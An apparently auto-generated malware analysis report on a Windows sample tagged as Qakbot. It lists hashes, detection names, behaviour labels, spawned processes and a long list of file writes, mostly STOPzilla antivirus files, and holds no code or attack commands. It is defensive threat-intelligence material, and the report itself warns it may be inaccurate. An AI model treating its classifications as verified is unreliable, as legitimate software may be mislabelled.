Qakbot_76507644f6

by malwarelabrobot on April 26th, 2015 in Malware Descriptions.

mzpefinder_pcap_file.YR, Qakbot.YR, GenericInjector.YR, GenericIRCBot.YR, TrojanDownloaderVundo.YR, TrojanPSWOnlineGames.YR, PUPHomePages.YR, PackedMysticCompressor.YR, GenericDownloader.YR, RATTurkojan.YR, GenericAutorunWorm.YR, SpyEye.YR, Necurs.YR, PackedThemida.YR, GenericPhysicalDrive0.YR, Bancos.YR, BankerGeneric.YR (Lavasoft MAS)
Behaviour: Trojan-Downloader, Trojan-PSW, Banker, OnlineGames, Trojan, Worm, Packed, PUP, WormAutorun, IRCBot


The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.

Requires JavaScript enabled!

Summary
Dynamic Analysis
Static Analysis
Network Activity
Map
Strings from Dumps
Removals

MD5: 76507644f6d260d0bd52b3650c4c3991
SHA1: 6f50fb678f311c17be31f51c36cd1be2c2094640
SHA256: c5217ce2b55c003a08bf4d1dd3063ecf28a23089e2f52fc52e7f1e664d74aafc
SSDeep: 49152:58JnE3qBoj9ghi1RebpyTIg9Cbk/VRduSwZPSCdDS OuSlMQSFh6:58JnEwoj9ghi1RebMIg9Cbk/VeS
Size: 2042440 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: UPolyXv05_v6
Company: iS3, Inc.
Created at: 2015-04-07 19:50:21
Analyzed on: Windows7Ada SP1 64-bit


Summary:

Trojan-Downloader. Trojan program, which downloads files from the Internet without user's notice and executes them.

Payload

Behaviour Description
WormAutorun A worm can spread via removable drives. It writes its executable and creates "autorun.inf" scripts on all removable drives. The autorun script will execute the Trojan's file once a user opens a drive's folder in Windows Explorer.
IRCBot A bot can communicate with command and control servers via IRC channel.


Process activity

The Trojan creates the following process(es):

SBSetupDrivers.exe:3152
SBSetupDrivers.exe:1812
%original file name%.exe:1912
runonce.exe:3092
runonce.exe:2736
GFI.Tools.Run64.exe:1928
DrvInst.exe:2212
DrvInst.exe:1680
STOPzilla.exe:3836
RUNDLL32.exe:3528
regsvr32.exe:3500
regsvr32.exe:1496
SZNetAssistant.exe:3916
mobsync.exe:3264
SZServer.exe:3384
SZServer.exe:992
SZWSC.exe:3788
SZWSC.exe:2612
MsiExec.exe:2456
MsiExec.exe:2624

The Trojan injects its code into the following process(es):

SBAMSvc.exe:3448

Mutexes

The following mutexes were created/opened:
No objects were found.

File activity

The process SBSetupDrivers.exe:3152 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Windows\System32\drivers\sbwtis.sys (90 bytes)
%Program Files% (x86)\STOPzilla\Drivers\amd64\wnet\SbFwIm.sys (122 bytes)
%Program Files% (x86)\STOPzilla\Drivers\amd64\sbapifs.sys (90 bytes)
%Program Files% (x86)\STOPzilla\Drivers\amd64\wlh\sbhips.sys (65 bytes)
C:\Windows\System32\drivers\sbhips.sys (65 bytes)
%Program Files% (x86)\STOPzilla\Drivers\amd64\wlh\SBWTIS.sys (90 bytes)
%Program Files% (x86)\STOPzilla\Drivers\amd64\wlh\sbfw.sys (262 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\DRVSetup\SetupDrv.log (17489 bytes)
C:\Windows\System32\drivers\sbapifs.sys (90 bytes)
C:\Windows\System32\drivers\SbFw.sys (1543 bytes)

The process SBSetupDrivers.exe:1812 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Windows\System32\drivers\SETEAAC.tmp (601 bytes)
C:\Windows\System32\drivers\SbFwIm.sys (601 bytes)
C:\Windows\System32\DriverStore\infpub.dat (496 bytes)
C:\Windows\System32\drivers\sbhips.sys (63 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\{332d6cab-08ae-5fa0-2478-ed478992213a}\SETDB51.tmp (3 bytes)
C:\Windows\System32\config\SYSTEM (6769 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\{6b8be61a-1242-088c-2864-a834156d4a47}\SETDDB5.tmp (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\{6b8be61a-1242-088c-2864-a834156d4a47}\SETDDB4.tmp (8 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\{332d6cab-08ae-5fa0-2478-ed478992213a}\SETDB31.tmp (8 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\{332d6cab-08ae-5fa0-2478-ed478992213a}\amd64\wnet\SETDB62.tmp (601 bytes)
C:\Windows\System32\DriverStore\infstrng.dat (1764 bytes)
C:\Windows\System32\config\SYSTEM.LOG1 (9355 bytes)
C:\Windows\System32\catroot2\dberr.txt (1248 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\DRVSetup\SetupDrv.log (9771 bytes)
C:\Windows\System32\drivers\SbFw.sys (1281 bytes)
C:\$Directory (768 bytes)
C:\Windows\inf\oem13.PNF (8464 bytes)
C:\Windows\inf\oem14.PNF (4811 bytes)
C:\Windows\System32\drivers\SETED8A.tmp (601 bytes)

The process SBAMSvc.exe:3448 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Program Files% (x86)\STOPzilla\Definitions\LKGD\elf_hash.dat (5280 bytes)
C:\ProgramData\Microsoft\Crypto\RSA\S-1-5-18\a81bb17e1f5dc49a730b06b63f6d28e9_c0322acd-5e5d-42f0-b163-c591ee6ff5b9 (61 bytes)
%Program Files% (x86)\STOPzilla\Definitions\Staging\libNSIS.dll (3729 bytes)
C:\ProgramData\STOPzilla!\Events\EV2015042504170900.xml (414 bytes)
%Program Files% (x86)\STOPzilla\Definitions\ih.vdx (1425 bytes)
%Program Files% (x86)\STOPzilla\Definitions\Staging\EPSigs.vdx (65 bytes)
C:\ProgramData\STOPzilla!\ThreatNetConfig.xml (810 bytes)
%Program Files% (x86)\STOPzilla\Definitions\LKGD\mime0.std (260 bytes)
%Program Files% (x86)\STOPzilla\Definitions\Staging\libMsCab.dll (6049 bytes)
%Program Files% (x86)\STOPzilla\Definitions\Staging\libRar.dll (5729 bytes)
%Program Files% (x86)\STOPzilla\Definitions\LKGD\gfiarkup.dll (6010 bytes)
%Program Files% (x86)\STOPzilla\gfiark.dll (61 bytes)
%Program Files% (x86)\STOPzilla\Definitions\white0.std (15 bytes)
%Program Files% (x86)\STOPzilla\Definitions\libMsi.dll (673 bytes)
%Program Files% (x86)\STOPzilla\Definitions\Staging\cblk.vtd (1236324 bytes)
%Program Files% (x86)\STOPzilla\Definitions\networkrules.dat (4 bytes)
%Program Files% (x86)\STOPzilla\Definitions\fsigs.vdx (192 bytes)
%Program Files% (x86)\STOPzilla\Definitions\LKGD\gfiutl64.sys (310 bytes)
%Program Files% (x86)\STOPzilla\Definitions\LKGD\DefVer.txt (260 bytes)
%Program Files% (x86)\STOPzilla\Definitions\libtd.dll (673 bytes)
%Program Files% (x86)\STOPzilla\Definitions\bhsl.vtd (22430 bytes)
%Program Files% (x86)\STOPzilla\Definitions\Staging\libtd.dll (2377 bytes)
%Program Files% (x86)\STOPzilla\gfiark32.sys (43 bytes)
%Program Files% (x86)\STOPzilla\Definitions\LKGD\adsrules.dat (14250 bytes)
%Program Files% (x86)\STOPzilla\Definitions\LKGD\SBTS.dat (3280 bytes)
%Program Files% (x86)\STOPzilla\Definitions\Staging (20 bytes)
%Program Files% (x86)\STOPzilla\Definitions\libEmail.dll (1425 bytes)
%Program Files% (x86)\STOPzilla\Definitions\Staging\SBTS.dat (328 bytes)
%Program Files% (x86)\STOPzilla\Definitions\macroptn.std (673 bytes)
%Program Files% (x86)\STOPzilla\Definitions\Staging\macroptn.std (7306 bytes)
%Program Files% (x86)\STOPzilla\Definitions\LKGD\smim0.std (50 bytes)
%Program Files% (x86)\STOPzilla\Definitions\CatDesc.vdx (673 bytes)
C:\ProgramData\STOPzilla!\ServiceConfig.xml (10 bytes)
%Program Files% (x86)\STOPzilla\Definitions\Staging\hcol.wtd (226 bytes)
%Program Files% (x86)\STOPzilla\Definitions\lgpl.dll (7345 bytes)
%Program Files% (x86)\STOPzilla\Definitions\LKGD\apincl.dat (7140 bytes)
%Program Files% (x86)\STOPzilla\Definitions\Staging\libCHM.dll (1873 bytes)
%Program Files% (x86)\STOPzilla\Definitions\LKGD\sdll0.std (223360 bytes)
%Program Files% (x86)\STOPzilla\Definitions\Staging\updater.dll (3665 bytes)
%Program Files% (x86)\STOPzilla\Definitions\Staging\ThreatDT.vdx (392 bytes)
%Program Files% (x86)\STOPzilla\Definitions\smim0.std (5 bytes)
%Program Files% (x86)\STOPzilla\Definitions\elf_hash.dat (528 bytes)
%Program Files% (x86)\STOPzilla\Definitions\LKGD\IncompatiblePrograms.dll (6010 bytes)
%Program Files% (x86)\STOPzilla\Definitions\api0.std (3073 bytes)
%Program Files% (x86)\STOPzilla\Definitions\Staging\ip.vtd (824 bytes)
%Program Files% (x86)\STOPzilla\SBTE.dll (49 bytes)
C:\ProgramData\STOPzilla!\History\20150425042029.xml (38 bytes)
%Program Files% (x86)\STOPzilla\Definitions\LKGD\libNSIS.dll (12810 bytes)
%Program Files% (x86)\STOPzilla\Definitions\Staging\api0.std (524 bytes)
%Program Files% (x86)\STOPzilla\Definitions\DefVer.txt (26 bytes)
C:\ProgramData\STOPzilla!\FirewallConfig.xml (1434 bytes)
%Program Files% (x86)\STOPzilla\Definitions\LKGD\heur0.std (20 bytes)
%Program Files% (x86)\STOPzilla\mimepp.dll (212 bytes)
%Program Files% (x86)\STOPzilla\Definitions\Staging\remediation.dll (7961 bytes)
%Program Files% (x86)\STOPzilla\Definitions\LKGD\libRTF.dll (6730 bytes)
%Program Files% (x86)\STOPzilla\Definitions\Staging\incompats.dat (1 bytes)
%Program Files% (x86)\STOPzilla\Definitions\updater.dll (849 bytes)
%Program Files% (x86)\STOPzilla\Definitions\Staging\libBase64.dll (7025 bytes)
%Program Files% (x86)\STOPzilla\Definitions\Staging\dnrl.vdx (1513 bytes)
%Program Files% (x86)\STOPzilla\Definitions\Staging\AdviceTx.vdx (10 bytes)
%Program Files% (x86)\STOPzilla\Definitions\Staging\ThreatCategoryGlossary.xsd (1 bytes)
%Program Files% (x86)\STOPzilla\Definitions\TImem.vdx (3 bytes)
%Program Files% (x86)\STOPzilla\Definitions\Staging\sdll0.std (64896 bytes)
%Program Files% (x86)\STOPzilla\Definitions\Staging\libVvs.dll (12217 bytes)
%Program Files% (x86)\STOPzilla\Definitions\LKGD\networkrules.dat (40 bytes)
C:\ProgramData\STOPzilla!\RegistrationConfig.xml (2408 bytes)
%Program Files% (x86)\STOPzilla\Definitions\LKGD\whsl.wtd (41850 bytes)
C:\ProgramData\STOPzilla!\ThreatDefinitionsConfig.xml (2236 bytes)
%Program Files% (x86)\STOPzilla\gfiutl64.sys (63 bytes)
%Program Files% (x86)\STOPzilla\Definitions\dex_hash.dat (132706 bytes)
%Program Files% (x86)\STOPzilla\Definitions\Staging\RegDT.vdx (36934 bytes)
%Program Files% (x86)\STOPzilla\Definitions\FastSigs.vdx (1425 bytes)
%Program Files% (x86)\STOPzilla\Definitions\RTmem.vdx (3 bytes)
%Program Files% (x86)\STOPzilla\Definitions\Staging\unpck0.std (55 bytes)
%Program Files% (x86)\STOPzilla\Definitions\Staging\gfiarkup.dll (2537 bytes)
%Program Files% (x86)\STOPzilla\Definitions\Staging\FolderDT.vdx (1953 bytes)
%Program Files% (x86)\STOPzilla\Definitions\libZip.dll (1281 bytes)
%Program Files% (x86)\STOPzilla\Definitions\gfiutl32.sys (24 bytes)
%Program Files% (x86)\STOPzilla\Definitions\dnrl.vdx (1281 bytes)
%Program Files% (x86)\STOPzilla\Definitions\LKGD\CoreVer.txt (30 bytes)
%Program Files% (x86)\STOPzilla\Definitions\Staging\dex_hash.dat (378000 bytes)
%Program Files% (x86)\STOPzilla\Definitions\Staging\libZip.dll (3441 bytes)
%Program Files% (x86)\STOPzilla\Definitions\ThreatCategoryGlossary.xsd (1 bytes)
%Program Files% (x86)\STOPzilla\Definitions\LKGD\CatDesc.vdx (6730 bytes)
%Program Files% (x86)\STOPzilla\Definitions\FileDT.vdx (673 bytes)
%Program Files% (x86)\STOPzilla\Definitions\Staging\qscnf.vdx (541 bytes)
%Program Files% (x86)\STOPzilla\Definitions\LKGD\VVSSigs.vdx (360 bytes)
%Program Files% (x86)\STOPzilla\Definitions\Staging\ih.vdx (11863 bytes)
%Program Files% (x86)\STOPzilla\Definitions\CoreVer.txt (3 bytes)
%Program Files% (x86)\STOPzilla\Definitions\bhmem.vtd (484 bytes)
%Program Files% (x86)\STOPzilla\Definitions\Cookies.vdx (1281 bytes)
%Program Files% (x86)\STOPzilla\Definitions\LKGD\dnrl.vdx (12810 bytes)
%Program Files% (x86)\STOPzilla\Definitions\gfiutil.dll (14 bytes)
%Program Files% (x86)\STOPzilla\Definitions\AdviceTx.vdx (10 bytes)
%Program Files% (x86)\STOPzilla\Definitions\Staging\CatID.vdx (9 bytes)
%Program Files% (x86)\STOPzilla\Definitions\LKGD\libOleA.dll (21050 bytes)
%Program Files% (x86)\STOPzilla\Definitions\LKGD\ThreatDT.vdx (545890 bytes)
%Program Files% (x86)\STOPzilla\Definitions\Staging\libOleA.dll (4497 bytes)
%Program Files% (x86)\STOPzilla\Definitions\ihmem.vtd (540 bytes)
%Program Files% (x86)\STOPzilla\Definitions\Staging\libMachoUniv.dll (2337 bytes)
%Program Files% (x86)\STOPzilla\Definitions\Staging\mime0.std (26 bytes)
%Program Files% (x86)\STOPzilla\Definitions\whsl.wtd (4185 bytes)
%Program Files% (x86)\STOPzilla\Definitions\remediation.dll (2449 bytes)
%Program Files% (x86)\STOPzilla\Definitions\libOleA.dll (2105 bytes)
%Program Files% (x86)\STOPzilla\Definitions\kbu.dat (84216 bytes)
%Program Files% (x86)\STOPzilla\Definitions\heur0.std (2 bytes)
%Program Files% (x86)\STOPzilla\Definitions\Staging\patchw32.dll (3226 bytes)
%Program Files% (x86)\STOPzilla\Definitions\Staging\qscnr.vdx (8 bytes)
%Program Files% (x86)\STOPzilla\Definitions\LKGD\libCHM.dll (6730 bytes)
%Program Files% (x86)\STOPzilla\Definitions\Staging\networkrules.dat (4 bytes)
C:\Windows\System32\drivers\gfiark.sys (86 bytes)
%Program Files% (x86)\STOPzilla\Definitions\LKGD\WebFilterExceptions.dat (1840 bytes)
%Program Files% (x86)\STOPzilla\Definitions\EPSigs.vdx (65 bytes)
%Program Files% (x86)\STOPzilla\Definitions\Staging\hstn.vtd (1369 bytes)
%Program Files% (x86)\STOPzilla\Definitions\LKGD\libZip.dll (12810 bytes)
%Program Files% (x86)\STOPzilla\Definitions\LKGD\hstn.vtd (6010 bytes)
%Program Files% (x86)\STOPzilla\Definitions\hstn.vtd (601 bytes)
%Program Files% (x86)\STOPzilla\Definitions\LKGD\incompats.dat (10 bytes)
%Program Files% (x86)\STOPzilla\Definitions\LKGD (20 bytes)
%Program Files% (x86)\STOPzilla\Definitions\libMachoUniv.dll (673 bytes)
C:\ProgramData\STOPzilla!\SoftwareUpdateConfig.xml (1244 bytes)
%Program Files% (x86)\STOPzilla\Definitions\Staging\gfiark64.sys (41 bytes)
%Program Files% (x86)\STOPzilla\Definitions\Staging\adsrules.dat (281 bytes)
%Program Files% (x86)\STOPzilla\Definitions\cmem.vtd (692 bytes)
%Program Files% (x86)\STOPzilla\Definitions\Staging\gfiutl32.sys (24 bytes)
%Program Files% (x86)\STOPzilla\Definitions\mime0.std (26 bytes)
%Program Files% (x86)\STOPzilla\Definitions\LKGD\EPSigs.vdx (650 bytes)
%Program Files% (x86)\STOPzilla\Definitions\kbu.dll (62 bytes)
%Program Files% (x86)\STOPzilla\Definitions\LKGD\ip.vtd (8240 bytes)
%Program Files% (x86)\STOPzilla\Definitions\LKGD\remediation.dll (21050 bytes)
%Program Files% (x86)\STOPzilla\Definitions\Staging\comp0.std (43 bytes)
%Program Files% (x86)\STOPzilla\Definitions\SBTS.dat (328 bytes)
%Program Files% (x86)\STOPzilla\Definitions\pack0.std (14 bytes)
%Program Files% (x86)\STOPzilla\Definitions\Staging\IncompatiblePrograms.dll (2281 bytes)
%Program Files% (x86)\STOPzilla\Definitions\Staging\whsl.wtd (5041 bytes)
%Program Files% (x86)\STOPzilla\Definitions\libNSIS.dll (1281 bytes)
%Program Files% (x86)\STOPzilla\Definitions\LKGD\CatID.vdx (90 bytes)
%Program Files% (x86)\STOPzilla\Definitions\LKGD\acertdefs0.std (4770 bytes)
%Program Files% (x86)\STOPzilla\Definitions\idsrules.dat (673 bytes)
%Program Files% (x86)\STOPzilla\Definitions\Staging\WebFilterExceptions.dat (184 bytes)
%Program Files% (x86)\STOPzilla\Definitions\Staging\gfiark.dll (955 bytes)
%Program Files% (x86)\STOPzilla\Definitions\script0.std (673 bytes)
%Program Files% (x86)\STOPzilla\Definitions\Staging\FileDT.vdx (3227 bytes)
%Program Files% (x86)\STOPzilla\Definitions\LKGD\patchw32.dll (12810 bytes)
%Program Files% (x86)\STOPzilla\Definitions\Staging\lgpl.dll (13065 bytes)
%Program Files% (x86)\STOPzilla\Definitions\LKGD\bhsl.vtd (224300 bytes)
%Program Files% (x86)\STOPzilla\Definitions\HistoryCleaner.xml (673 bytes)
%Program Files% (x86)\STOPzilla\Definitions\Staging\smim0.std (5 bytes)
%Program Files% (x86)\STOPzilla\Definitions\LKGD\RegDT.vdx (74330 bytes)
%Program Files% (x86)\STOPzilla\Definitions\LKGD\cname.wtd (6010 bytes)
%Program Files% (x86)\STOPzilla\Definitions\JSSigs.vdx (8281 bytes)
%Program Files% (x86)\STOPzilla\Definitions\LKGD\libEmail.dll (14250 bytes)
%Program Files% (x86)\STOPzilla\Definitions\Staging\lib7zip.dll (4425 bytes)
%Program Files% (x86)\STOPzilla\Definitions\Staging\VVSSigs.vdx (36 bytes)
%Program Files% (x86)\STOPzilla\Definitions\gfiark.dll (29 bytes)
%Program Files% (x86)\STOPzilla\Definitions\LKGD\FastSigs.vdx (14250 bytes)
%Program Files% (x86)\STOPzilla\Definitions\libVvs.dll (2105 bytes)
%Program Files% (x86)\STOPzilla\Definitions\qscnf.vdx (541 bytes)
%Program Files% (x86)\STOPzilla\Definitions\RegDT.vdx (7433 bytes)
%Program Files% (x86)\STOPzilla\Definitions\Staging\libEmail.dll (6505 bytes)
%Program Files% (x86)\STOPzilla\Definitions\Staging\pack0.std (14 bytes)
%Program Files% (x86)\STOPzilla\Definitions\Staging\RTA84430 (5516 bytes)
%Program Files% (x86)\STOPzilla\Definitions\Staging\kbu.dat (86490 bytes)
%Program Files% (x86)\STOPzilla\Definitions\Staging\SBBIN.RTP (405 bytes)
%Program Files% (x86)\STOPzilla\Definitions\bmem.vtd (708 bytes)
%Program Files% (x86)\STOPzilla\Definitions\LKGD\FolderDT.vdx (6010 bytes)
%Program Files% (x86)\STOPzilla\Definitions\libBase64.dll (673 bytes)
%Program Files% (x86)\STOPzilla\Definitions\LKGD\apprules.dat (10 bytes)
%Program Files% (x86)\STOPzilla\Definitions\LKGD\lgpl.dll (73450 bytes)
%Program Files% (x86)\STOPzilla\Definitions\hcol.wtd (50 bytes)
%Program Files% (x86)\STOPzilla\Definitions\dnrlmem.vtd (554 bytes)
%Program Files% (x86)\STOPzilla\Definitions\Staging\cname.wtd (905 bytes)
%Program Files% (x86)\STOPzilla\Definitions\dexmem.vtd (348 bytes)
%Program Files% (x86)\STOPzilla\Definitions\Staging\gfiutl64.sys (31 bytes)
%Program Files% (x86)\STOPzilla\Definitions\sel.dat (6 bytes)
%Program Files% (x86)\STOPzilla\Definitions\LKGD\qscnf.vdx (5410 bytes)
%Program Files% (x86)\STOPzilla\SBAMConfig.bin (20 bytes)
%Program Files% (x86)\STOPzilla\Definitions\Staging\ctid.vtd (2001852 bytes)
%Program Files% (x86)\STOPzilla\Definitions\Staging\JSSigs.vdx (1 bytes)
C:\ProgramData\STOPzilla!\HIPSConfig.xml (3056 bytes)
%Program Files% (x86)\STOPzilla\Definitions\LKGD\gfiutl32.sys (240 bytes)
%Program Files% (x86)\STOPzilla\Definitions\Staging\DefVer.txt (260 bytes)
%Program Files% (x86)\STOPzilla\Definitions\qscnr.vdx (8 bytes)
%Program Files% (x86)\STOPzilla\Definitions\libMsCab.dll (2321 bytes)
%Program Files% (x86)\STOPzilla\Definitions\WebFilterExceptions.dat (184 bytes)
%Program Files% (x86)\STOPzilla\Definitions\patchw32.dll (1514 bytes)
%Program Files% (x86)\STOPzilla\Definitions\LKGD\white.wtd (3903230 bytes)
%Program Files% (x86)\STOPzilla\Definitions\Staging\defs0.std (50348 bytes)
%Program Files% (x86)\STOPzilla\Definitions\LKGD\vcore.dll (395060 bytes)
%Program Files% (x86)\STOPzilla\Definitions\vcore.dll (40233 bytes)
%Program Files% (x86)\STOPzilla\Definitions\VVSSigs.vdx (36 bytes)
%Program Files% (x86)\STOPzilla\Definitions\LKGD\libRar.dll (14250 bytes)
%Program Files% (x86)\STOPzilla\Definitions\LKGD\gfiark64.sys (410 bytes)
%Program Files% (x86)\STOPzilla\Definitions\LKGD\ih.vdx (14250 bytes)
%Program Files% (x86)\STOPzilla\Definitions\LKGD\script0.std (6730 bytes)
%Program Files% (x86)\STOPzilla\Definitions\LKGD\ThreatCategoryGlossary.xml (470 bytes)
%Program Files% (x86)\STOPzilla\Definitions\LKGD\JSSigs.vdx (82810 bytes)
%Program Files% (x86)\STOPzilla\Definitions\Staging\gfiark32.sys (823 bytes)
%Program Files% (x86)\STOPzilla\Definitions\LKGD\libMsCab.dll (23210 bytes)
%Program Files% (x86)\STOPzilla\Definitions\LKGD\idsrules.dat (6730 bytes)
%Program Files% (x86)\STOPzilla\Definitions\LKGD\FileDT.vdx (6730 bytes)
%Program Files% (x86)\STOPzilla\Definitions\LKGD\comp0.std (430 bytes)
%Program Files% (x86)\STOPzilla\Definitions\IncompatiblePrograms.dll (601 bytes)
%Program Files% (x86)\STOPzilla\Definitions\LKGD\dex_hash.dat (1327060 bytes)
%Program Files% (x86)\STOPzilla\gfiark64.sys (86 bytes)
%Program Files% (x86)\STOPzilla\Definitions\Staging\libRTF.dll (1761 bytes)
%Program Files% (x86)\STOPzilla\Definitions\LKGD\Cookies.vdx (12810 bytes)
%Program Files% (x86)\STOPzilla\Definitions\LKGD\updater.dll (6730 bytes)
C:\ProgramData\STOPzilla!\APConfig.xml (592 bytes)
%Program Files% (x86)\STOPzilla\Definitions\Staging\acertdefs0.std (477 bytes)
%Program Files% (x86)\STOPzilla\Definitions\LKGD\RootCA.wtd (340 bytes)
%Program Files% (x86)\STOPzilla\Definitions\rem0.std (9605 bytes)
%Program Files% (x86)\STOPzilla\Definitions\LKGD\pack0.std (140 bytes)
%Program Files% (x86)\STOPzilla\Definitions\LKGD\libMsi.dll (6730 bytes)
%Program Files% (x86)\STOPzilla\Definitions\Staging\white.wtd (492846 bytes)
%Program Files% (x86)\STOPzilla\Definitions\gfiutl64.sys (31 bytes)
%Program Files% (x86)\STOPzilla\Definitions\LKGD\hcol.wtd (500 bytes)
%Program Files% (x86)\STOPzilla\Definitions\Staging\kbu.dll (450 bytes)
%Program Files% (x86)\STOPzilla\Definitions\Staging\idsrules.dat (136 bytes)
C:\ProgramData\STOPzilla!\HttpServerConfig.xml (624 bytes)
%Program Files% (x86)\STOPzilla\Definitions\gfiarkup.dll (601 bytes)
%Program Files% (x86)\STOPzilla\Definitions\libRTF.dll (673 bytes)
%Program Files% (x86)\STOPzilla\Definitions\LKGD\libVvs.dll (21050 bytes)
%Program Files% (x86)\STOPzilla\Definitions\Staging\RootCA.wtd (34 bytes)
%Program Files% (x86)\STOPzilla\Definitions\ThreatCategoryGlossary.xml (47 bytes)
%Program Files% (x86)\STOPzilla\Definitions\RootCA.wtd (34 bytes)
%Program Files% (x86)\STOPzilla\Definitions\Staging\apincl.dat (714 bytes)
%Program Files% (x86)\STOPzilla\Definitions\Staging\ThreatID.vdx (8632 bytes)
%Program Files% (x86)\STOPzilla\Definitions\LKGD\white0.std (150 bytes)
%Program Files% (x86)\STOPzilla\Definitions\ckmem.vdx (412 bytes)
%Program Files% (x86)\STOPzilla\Definitions\LKGD\defs0.std (852280 bytes)
%Program Files% (x86)\STOPzilla\Definitions\LKGD\HistoryCleaner.xml (6730 bytes)
%Program Files% (x86)\STOPzilla\SbHips.dll (90 bytes)
%Program Files% (x86)\STOPzilla\Definitions\LKGD\kbu.dll (620 bytes)
C:\ProgramData\STOPzilla!\CountScans.XML (338 bytes)
%Program Files% (x86)\STOPzilla\Definitions\LKGD\AdviceTx.vdx (100 bytes)
%Program Files% (x86)\STOPzilla\gfiutil.dll (30 bytes)
%Program Files% (x86)\STOPzilla\Definitions\Staging\ThreatCategoryGlossary.xml (47 bytes)
%Program Files% (x86)\STOPzilla\Definitions\Staging\fsigs.vdx (192 bytes)
%Program Files% (x86)\STOPzilla\Definitions\apprules.dat (1 bytes)
%Program Files% (x86)\STOPzilla\Definitions\Staging\rem0.std (57449 bytes)
%Program Files% (x86)\STOPzilla\Definitions\Staging\sel.dat (6 bytes)
C:\ProgramData\STOPzilla!\Logs\SBAMThreatEngineLog.csv (1134046 bytes)
C:\Windows\System32\drivers\gfiutil.sys (63 bytes)
%Program Files% (x86)\STOPzilla\Definitions\cblk.vtd (998680 bytes)
%Program Files% (x86)\STOPzilla\Definitions\comp0.std (43 bytes)
%Program Files% (x86)\STOPzilla\kbu.dll (127 bytes)
%Program Files% (x86)\STOPzilla\FSSC.dat (12 bytes)
%Program Files% (x86)\STOPzilla\Definitions\CatID.vdx (9 bytes)
%Program Files% (x86)\STOPzilla\Definitions\LKGD\kbu.dat (842160 bytes)
%Program Files% (x86)\STOPzilla\Definitions\LKGD\libMachoUniv.dll (6730 bytes)
C:\ProgramData\STOPzilla!\WSCConfig.xml (1330 bytes)
%Program Files% (x86)\STOPzilla\Definitions\Staging\gfiutil.dll (14 bytes)
%Program Files% (x86)\STOPzilla\Definitions\LKGD\libtd.dll (6730 bytes)
%Program Files% (x86)\STOPzilla\Definitions\LKGD\lib7zip.dll (6730 bytes)
C:\ProgramData\STOPzilla!\Events\EV2015042504171201.xml (370 bytes)
%Program Files% (x86)\STOPzilla\Definitions\gfiark64.sys (41 bytes)
C:\ProgramData\STOPzilla!\Events\EV2015042504202902.xml (370 bytes)
%Program Files% (x86)\STOPzilla\gfiutl32.sys (24 bytes)
%Program Files% (x86)\STOPzilla\Definitions\Staging\heur0.std (2 bytes)
%Program Files% (x86)\STOPzilla\Definitions\LKGD\gfiutil.dll (140 bytes)
%Program Files% (x86)\STOPzilla\Definitions\sdll0.std (22336 bytes)
%Program Files% (x86)\STOPzilla\Definitions\LKGD\gfiark.dll (290 bytes)
%Program Files% (x86)\STOPzilla\Definitions\libRar.dll (1425 bytes)
%Program Files% (x86)\STOPzilla\Definitions\lib7zip.dll (673 bytes)
%Program Files% (x86)\STOPzilla\Definitions\gfiark32.sys (43 bytes)
%Program Files% (x86)\STOPzilla\Definitions\LKGD\ThreatCategoryGlossary.xsd (10 bytes)
%Program Files% (x86)\STOPzilla\Definitions\ThreatID.vdx (8281 bytes)
%Program Files% (x86)\STOPzilla\Definitions\ip.vtd (824 bytes)
%Program Files% (x86)\STOPzilla\Definitions\ThreatDT.vdx (54589 bytes)
%Program Files% (x86)\STOPzilla\Definitions\Staging\bhsl.vtd (40124 bytes)
%Program Files% (x86)\STOPzilla\Definitions\LKGD\gfiark32.sys (430 bytes)
%Program Files% (x86)\STOPzilla\Definitions\LKGD\api0.std (30730 bytes)
%Program Files% (x86)\STOPzilla\Definitions\unpck0.std (55 bytes)
%Program Files% (x86)\STOPzilla\Definitions\libCHM.dll (673 bytes)
%Program Files% (x86)\STOPzilla\Definitions\LKGD\sel.dat (60 bytes)
%Program Files% (x86)\STOPzilla\Definitions\defs0.std (85228 bytes)
%Program Files% (x86)\STOPzilla\Definitions\Staging\script0.std (5374 bytes)
%Program Files% (x86)\STOPzilla\Definitions\LKGD\ctid.vtd (3413080 bytes)
%Program Files% (x86)\STOPzilla\Definitions\Staging\vcore.dll (76554 bytes)
%Program Files% (x86)\STOPzilla\Definitions\LKGD\macroptn.std (6730 bytes)
%Program Files% (x86)\STOPzilla\Definitions\LKGD\rem0.std (96050 bytes)
%Program Files% (x86)\STOPzilla\Definitions\apincl.dat (714 bytes)
%Program Files% (x86)\STOPzilla\Definitions\Staging\apprules.dat (1 bytes)
%Program Files% (x86)\STOPzilla\Definitions\Staging\libMsi.dll (3761 bytes)
C:\ProgramData\STOPzilla!\EmailAVConfig.xml (205 bytes)
%Program Files% (x86)\STOPzilla\Definitions\incompats.dat (1 bytes)
%Program Files% (x86)\STOPzilla\Definitions\Staging\CatDesc.vdx (180 bytes)
%Program Files% (x86)\STOPzilla\Definitions\Staging\white0.std (15 bytes)
C:\ProgramData\STOPzilla!\ScanConfig.xml (2932 bytes)
%Program Files% (x86)\STOPzilla\SBTIS.dll (114 bytes)
%Program Files% (x86)\STOPzilla\Definitions\white.wtd (390323 bytes)
%Program Files% (x86)\STOPzilla\Definitions\acertdefs0.std (477 bytes)
%Program Files% (x86)\STOPzilla\Definitions\Staging\Cookies.vdx (3097 bytes)
%Program Files% (x86)\STOPzilla\Definitions\Staging\CoreVer.txt (30 bytes)
%Program Files% (x86)\STOPzilla\Definitions\LKGD\cblk.vtd (9985728 bytes)
%Program Files% (x86)\STOPzilla\Definitions\LKGD\fsigs.vdx (1920 bytes)
%Program Files% (x86)\STOPzilla\Definitions\adsrules.dat (1425 bytes)
%Program Files% (x86)\STOPzilla\Definitions\LKGD\unpck0.std (550 bytes)
%Program Files% (x86)\STOPzilla\Definitions\FolderDT.vdx (601 bytes)
%Program Files% (x86)\STOPzilla\Definitions\LKGD\libBase64.dll (6730 bytes)
